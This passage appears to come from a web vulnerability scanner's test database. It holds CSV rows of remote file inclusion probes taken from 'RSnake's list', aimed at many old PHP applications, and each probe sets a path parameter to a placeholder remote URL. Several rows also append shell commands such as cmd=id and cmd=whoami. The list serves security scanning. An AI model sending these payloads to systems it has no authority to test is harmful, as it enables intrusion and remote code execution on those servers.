(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004657\",\"5292\",\"c\",\"/dosearch.php?RESPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004658\",\"5292\",\"c\",\"/download.php?root_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004659\",\"5292\",\"c\",\"/download.php?root_prefix=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004660\",\"5292\",\"c\",\"/download_engine_V1.4.3/addmember.php?eng_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004661\",\"5292\",\"c\",\"/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004662\",\"5292\",\"c\",\"/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004663\",\"5292\",\"c\",\"/downstat1.8/chart.php?art=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004664\",\"5292\",\"c\",\"/dp_logs.php?HomeDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004665\",\"5292\",\"c\",\"/eXPerience2/modules.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004666\",\"5292\",\"c\",\"/ea-gBook/index_inc.php?inc_ordner=@RFIURL?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004667\",\"5292\",\"c\",\"/edit.php?javascript_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004668\",\"5292\",\"c\",\"/editor.php?newsfile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004669\",\"5292\",\"c\",\"/editprofile.php?pathtohomedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004670\",\"5292\",\"c\",\"/editsite.php?returnpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004671\",\"5292\",\"c\",\"/editx/add_address.php?include_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004672\",\"5292\",\"c\",\"/elseif/contenus.php?contenus=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004673\",\"5292\",\"c\",\"/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004674\",\"5292\",\"c\",\"/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004675\",\"5292\",\"c\",\"/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004676\",\"5292\",\"c\",\"/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004677\",\"5292\",\"c\",\"/elseif/moduleajouter/depot/usrdepot.php?corpsdesign@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004678\",\"5292\",\"c\",\"/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004679\",\"5292\",\"c\",\"/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004680\",\"5292\",\"c\",\"/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004681\",\"5292\",\"c\",\"/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004682\",\"5292\",\"c\",\"/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004683\",\"5292\",\"c\",\"/email_subscribe.php?root_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004684\",\"5292\",\"c\",\"/email_subscribe.php?root_prefix=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004685\",\"5292\",\"c\",\"/embed/day.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004686\",\"5292\",\"c\",\"/enc/content.php?Home_Path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004687\",\"5292\",\"c\",\"/engine/Ajax/editnews.php?root_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004688\",\"5292\",\"c\",\"/engine/api/api.class.php?dle_config_api=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004689\",\"5292\",\"c\",\"/engine/engine.inc.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004690\",\"5292\",\"c\",\"/engine/init.php?root_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004691\",\"5292\",\"c\",\"/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004692\",\"5292\",\"c\",\"/enth3/show_joined.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004693\",\"5292\",\"c\",\"/environment.php?DIR_PREFIX=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004694\",\"5292\",\"c\",\"/epal/index.php?view=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004695\",\"5292\",\"c\",\"/errors.php?error=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004696\",\"5292\",\"c\",\"/errors/configmode.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004698\",\"5292\",\"c\",\"/errors/reconfigure.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004699\",\"5292\",\"c\",\"/errors/unconfigured.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004700\",\"5292\",\"c\",\"/es_custom_menu.php?files_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004701\",\"5292\",\"c\",\"/es_desp.php?files_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004702\",\"5292\",\"c\",\"/es_offer.php?files_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004703\",\"5292\",\"c\",\"/eshow.php?Config_rootdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004704\",\"5292\",\"c\",\"/esupport/admin/autoclose.php?subd=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004705\",\"5292\",\"c\",\"/eva/index.php3?aide=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004706\",\"5292\",\"c\",\"/eva/index.php3?aide=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004707\",\"5292\",\"c\",\"/eva/index.php3?perso=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004708\",\"5292\",\"c\",\"/eva/index.php?eva[caminho]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004709\",\"5292\",\"c\",\"/event.php?myevent_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004710\",\"5292\",\"c\",\"/event_cal/module/embed/day.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004711\",\"5292\",\"c\",\"/eventcal2.php.php?path_simpnews=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004712\",\"5292\",\"c\",\"/eventscroller.php?path_simpnews=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004713\",\"5292\",\"c\",\"/example-view/templates/article.php?globals[content_dir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004714\",\"5292\",\"c\",\"/example-view/templates/dates_list.php?globals[content_dir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004715\",\"5292\",\"c\",\"/example-view/templates/root.php?globals[content_dir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004716\",\"5292\",\"c\",\"/example.php?site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004717\",\"5292\",\"c\",\"/example/gamedemo/inc.functions.php?projectPath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004718\",\"5292\",\"c\",\"/examplefile.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004719\",\"5292\",\"c\",\"/examples/patExampleGen/bbcodeSource.php?example=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004720\",\"5292\",\"c\",\"/exception/include.php?_APP_RELATIVE_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004721\",\"5292\",\"c\",\"/extauth/drivers/ldap.inc.php?clarolineRepositorySys=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004722\",\"5292\",\"c\",\"/extras/mt.php?web_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004723\",\"5292\",\"c\",\"/extras/poll/poll.php?file_newsportal=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004724\",\"5292\",\"c\",\"/ezusermanager_pwd_forgott.php?ezUserManager_Path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004725\",\"5292\",\"c\",\"/faq.php?module_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004726\",\"5292\",\"c\",\"/faq.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004727\",\"5292\",\"c\",\"@FCKEDITOReditor/dialog/fck_link.php?dirroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004728\",\"5292\",\"c\",\"@FCKEDITOReditor/filemanager/browser/default/connectors/php/connector.php?Dirroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004729\",\"5292\",\"c\",\"@FCKEDITOReditor/filemanager/browser/default/connectors/php/connector.php?dirroot=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004730\",\"5292\",\"c\",\"/fcring.php?s_fuss=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004731\",\"5292\",\"c\",\"/feed.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004732\",\"5292\",\"c\",\"/feed/index2.php?m=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004733\",\"5292\",\"c\",\"/files/amazon-bestsellers.php?CarpPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004734\",\"5292\",\"c\",\"/files/carprss.php?CarpPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004735\",\"5292\",\"c\",\"/files/compose-attach.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004736\",\"5292\",\"c\",\"/files/compose-menu.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004737\",\"5292\",\"c\",\"/files/compose-new.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004738\",\"5292\",\"c\",\"/files/compose-send.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004739\",\"5292\",\"c\",\"/files/folder-create.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004740\",\"5292\",\"c\",\"/files/folder-delete.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004741\",\"5292\",\"c\",\"/files/folder-empty.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004742\",\"5292\",\"c\",\"/files/folder-rename.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004743\",\"5292\",\"c\",\"/files/folders.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004744\",\"5292\",\"c\",\"/files/login.php3?err=hack&BSX_HTXDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004745\",\"5292\",\"c\",\"/files/mainfile.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004746\",\"5292\",\"c\",\"/files/mbox-list.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004747\",\"5292\",\"c\",\"/files/message-delete.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004748\",\"5292\",\"c\",\"/files/message-forward.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004749\",\"5292\",\"c\",\"/files/message-header.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004750\",\"5292\",\"c\",\"/files/message-print.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004751\",\"5292\",\"c\",\"/files/message-read.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004752\",\"5292\",\"c\",\"/files/message-reply.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004753\",\"5292\",\"c\",\"/files/message-replyall.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004754\",\"5292\",\"c\",\"/files/message-search.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004755\",\"5292\",\"c\",\"/findix/index.php?page=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004756\",\"5292\",\"c\",\"/fishcart_v3/fc_functions/fc_example.php?docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004757\",\"5292\",\"c\",\"/flushcmd/Include/editor/rich_files/class.rich.php?class_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004758\",\"5292\",\"c\",\"/fonctions/template.php?repphp=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004759\",\"5292\",\"c\",\"/fonctions_racine.php?chemin_lib=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004760\",\"5292\",\"c\",\"/footer.inc.php?settings[footer]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004761\",\"5292\",\"c\",\"/footer.inc.php?tfooter=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004762\",\"5292\",\"c\",\"/footer.inc.php?tfooter=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004763\",\"5292\",\"c\",\"/footer.php?footer_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004764\",\"5292\",\"c\",\"/footer.php?op[footer_body]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004765\",\"5292\",\"c\",\"/form.php?path=@RFIURL?&cmd=pwd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004766\",\"5292\",\"c\",\"/forum.php?cfg_file=1&fpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004767\",\"5292\",\"c\",\"/forum/forum.php?view=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004768\",\"5292\",\"c\",\"/forum/forum82lib.php3?repertorylevel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004769\",\"5292\",\"c\",\"/forum/gesfil.php?repertorylevel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004770\",\"5292\",\"c\",\"/forum/lostpassword.php?repertorylevel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004771\",\"5292\",\"c\",\"/forum/mail.php?repertorylevel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004772\",\"5292\",\"c\",\"/forum/member.php?repertorylevel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004773\",\"5292\",\"c\",\"/forum/message.php?repertorylevel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004774\",\"5292\",\"c\",\"/forum/search.php?repertorylevel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004775\",\"5292\",\"c\",\"/forum/track.php?path=@RFIURL\",\"GET\",\"PHP 